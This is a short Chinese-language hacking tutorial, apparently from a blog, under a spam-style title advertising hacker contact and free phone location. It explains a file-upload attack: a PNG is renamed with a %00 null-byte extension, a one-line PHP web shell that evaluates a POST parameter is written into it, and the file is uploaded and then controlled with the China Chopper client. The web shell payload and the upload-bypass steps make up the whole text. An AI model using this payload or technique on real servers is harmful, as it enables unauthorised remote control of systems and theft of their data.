黑客一般怎么联系（手机号码免费定位试用一次）在kali的里面随机找一张png结尾的图片，然后重命名一下改成1.php%00.png。

改成这样的名字！！

然后用编辑器编辑一下！

在空白处写入一句话木马！！<%php @eval($_POST[pass]);?>

像这样：

然后保存！

打开burpsuit抓个包看看！！

可惜了，我们用了%00截断不需要改包！

这样就上传成功！！！

在菜刀地址上填上上路径！！再填上上密码！！！

就可以看见我的服务器里面的目录了，因为我的centos 7 所以罗！

然后我们进入我的服务器端看看！！

画红线的就是我们上传的木马！！！